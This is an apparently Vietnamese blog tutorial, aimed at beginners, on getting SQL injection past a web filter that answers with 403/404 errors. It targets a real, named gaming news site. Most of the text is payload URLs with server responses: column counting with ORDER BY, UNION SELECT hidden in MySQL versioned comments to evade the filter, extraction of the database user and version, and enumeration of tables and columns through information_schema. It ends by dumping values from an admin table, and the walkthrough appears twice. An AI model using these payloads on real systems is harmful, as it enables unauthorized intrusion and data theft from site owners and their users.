Vừa rồi làm by pass dạng 406 nên giờ làm tiếp tut by pass dạng 404 cho newbie học hỏi cách by pass.
Anh em biết rồi đừng chém nhé.
Site:
-->lỗi
+ Order by:
-->lỗi
+ --> Bình thường.
+ Union:
--> + By pass:
-->5,13,15,18.
+ Xem version:
-->check6_brad@localhost : check6_checker : 5.1.56
+ Get table::
--> + Tiếp tục by pass:
-->aa_admin_level_values
+ Get colums:
-->level_id
+ Get level_id:
-->2
Site này kỳ quá.
Chủ yếu là newbie biết kỹ thuật by pass dạng 404 .
Tut by co0c.
Anh em biết rồi đừng chém nhé.
Site:
-->lỗi
+ Order by:
Code:
http://check6gaming.com/news/67/gsl-final-preview&q=games.php?id=67' order by 19-- -
+
Code:
http://check6gaming.com/news/67/gsl-final-preview&q=games.php?id=67' order by 18-- -
+ Union:
Code:
http://check6gaming.com/news/67/gsl-final-preview&q=games.php?id=-67 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18-- -
403 Forbidden
You don't have permission to access /news/67/gsl-final-preview&q=games.php on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
You don't have permission to access /news/67/gsl-final-preview&q=games.php on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
Code:
http://check6gaming.com/news/67/gsl-final-preview&q=games.php?id=-67' UNION /*!SELECT*/ 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18-- -
+ Xem version:
Code:
http://check6gaming.com/news/67/gsl-final-preview&q=games.php?id=-67' UNION /*!SELECT*/ 1,2,3,4,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),6,7,8,9,10,11,12,13,14,15,16,17,18-- -
+ Get table::
Code:
http://check6gaming.com/news/67/gsl-final-preview&q=games.php?id=-67' /*!UNION /*!SeLeCT*/ 1,2,3,4,concat_ws(0x7c,table_name),6,7,8,9,10,11,12,13,14,15,16,17,18 from information_schema.tables where table_schema=database()-- -
Forbidden
You don't have permission to access /news/67/gsl-final-preview&q=games.php on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
You don't have permission to access /news/67/gsl-final-preview&q=games.php on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
Code:
http://check6gaming.com/news/67/gsl-final-preview&q=games.php?id=-67' /*!UNION /*!SeLeCT*/ 1,2,3,4,concat_ws(0x7c,table_name),6,7,8,9,10,11,12,13,14,15,16,17,18 from information_schema./*!tables*/ where table_schema=database()-- -
+ Get colums:
Code:
http://check6gaming.com/news/67/gsl-final-preview&q=games.php?id=-67' /*!UNION /*!SeLeCT*/ 1,2,3,4,concat_ws(0x7c,column_name),6,7,8,9,10,11,12,13,14,15,16,17,18 from information_schema./*!columns*/ where table_name=0x61615f61646d696e5f6c6576656c5f76616c756573-- -
+ Get level_id:
Code:
http://check6gaming.com/news/67/gsl-final-preview&q=games.php?id=-67' /*!UNION /*!SeLeCT*/ 1,2,3,4,5,6,7,8,9,10,11,12,concat_ws(0x7c,level_id),14,15,16,17,18 from aa_admin_level_values-- -
Site này kỳ quá.
Chủ yếu là newbie biết kỹ thuật by pass dạng 404 .
Tut by co0c.
Không có nhận xét nào:
Đăng nhận xét